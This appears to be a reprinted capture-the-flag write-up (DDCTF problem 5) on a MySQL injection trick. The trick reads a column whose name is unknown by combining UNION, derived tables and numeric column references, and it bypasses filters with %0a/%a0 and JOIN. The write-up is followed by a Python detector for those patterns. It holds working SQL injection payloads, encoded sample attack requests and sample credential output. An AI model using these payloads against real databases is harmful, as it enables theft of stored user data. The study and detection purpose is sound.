Key points of "MySQL database: how to cleverly bypass unknown column names, explained in detail":
Preface
This article covers problem 5 of DDCTF, a technique for bypassing unknown column names. I reproduced it on my own machine; the approach is elegant and clear, so I am sharing it. The details follow:
Approach
The challenge filters spaces and commas. Spaces can be replaced with %0a, %0b, %0c, %0d or %a0, or parentheses can be used directly as separators; commas can be bypassed with join.
The name of the column holding the flag is unknown, and information_schema.columns is also blocked (the hex-encoded table name is filtered), so the column names cannot be obtained. In that case a union query can be used; the process is as follows:
The idea is to obtain the flag by making it appear under a column name we do know. Because a UNION takes its column names from its first SELECT, the derived table's columns are named 1, 2, 3 and 4, and the fourth column can then be referenced as e.4 without ever learning the real column name.
Example code:
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
| 1 | admin | admin888 | 110@110.com |
| 2 | test  | test123  | 119@119.com |
| 3 | cs    | cs123    | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4           |
+-------------+
| 4           |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------+
| 4           |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id          | username | password | email       |
+-------------+----------+----------+-------------+
| 1           | admin    | admin888 | 110@110.com |
| 120@120.com | 1        | 1        | 1           |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
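As an added example that is not part of the original write-up, here is the detection side of the same technique: a small Python checker that percent-decodes a request target, normalizes the whitespace substitutes listed above (%0a, %0b, %0c, %0d, %a0) and the parenthesis separator, and then flags the UNION-with-derived-table, (select N)alias, numeric column reference and JOIN-for-comma patterns. The request lines are constructed, and the signature names are my own.

```python
import re
from urllib.parse import unquote_to_bytes

# Whitespace substitutes the write-up lists (%0a %0b %0c %0d %a0), as raw byte values.
WS_SUBS = b"\x0a\x0b\x0c\x0d\xa0"

# Signatures of the column-name-free UNION technique shown in the write-up (names are mine).
PATTERNS = {
    # UNION whose FROM is a derived table: union select ... from (select ...
    "union_derived_table": re.compile(r"union\s+select\b.*\bfrom\s*\(\s*select", re.I),
    # Placeholder columns such as (select 1)a, (select 2)b
    "derived_table_aliases": re.compile(r"\(\s*select\s+\d+\s*\)\s*[a-z]", re.I),
    # Reference to a column named by a digit, e.g. e.4
    "numeric_column_ref": re.compile(r"\b[a-z]+\.\d+\b", re.I),
    # (select 1)a join (select 2)b: JOIN standing in for a filtered comma
    "join_comma_bypass": re.compile(r"\)\s*[a-z]\s+join\s*\(", re.I),
}

def normalize(raw: str) -> str:
    """Percent-decode, map the whitespace substitutes to a space, and pad parentheses
    (which also work as separators) so every variant reaches the regexes in one form."""
    data = unquote_to_bytes(raw)
    for ws in WS_SUBS:
        data = data.replace(bytes([ws]), b" ")
    text = data.decode("latin-1").replace("(", " ( ").replace(")", " ) ")
    return re.sub(r"\s+", " ", text).strip().lower()

def analyze(raw: str) -> dict:
    """Return the signatures matched by one request target and the substitutes it used."""
    text = normalize(raw)
    hits = [name for name, pat in PATTERNS.items() if pat.search(text)]
    used = sorted({f"%{b:02x}" for b in unquote_to_bytes(raw) if b in WS_SUBS})
    return {"normalized": text, "hits": hits, "whitespace_substitutes": used}

# Constructed request targets (not taken from any real log): the first uses the %0a and JOIN
# substitutions, the second URL-encodes the write-up's e.4 query with plain spaces, the third is benign.
SAMPLE_REQUESTS = [
    "/view?id=1%0aunion%0aselect%0a*%0afrom%0a(select%0a1)a%0ajoin%0a(select%0a2)b",
    "/view?id=1%20union%20select%20e.4%20from%20(select%20*%20from%20(select%201)a,(select%202)b%20union%20select%20*%20from%20user)e",
    "/view?id=123",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(analyze(req))
```

Normalizing before matching is the point: a rule that looks for a literal space around union would miss every %0a/%a0 variant the write-up describes.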
Summary
That is all for this article. I hope it is of some help to your study or work; if you have questions, leave a comment and let's discuss. Thank you for supporting 維易PHP.
When reprinting, please cite this page's URL:
http://www.fzlkiss.com/jiaocheng/6396.html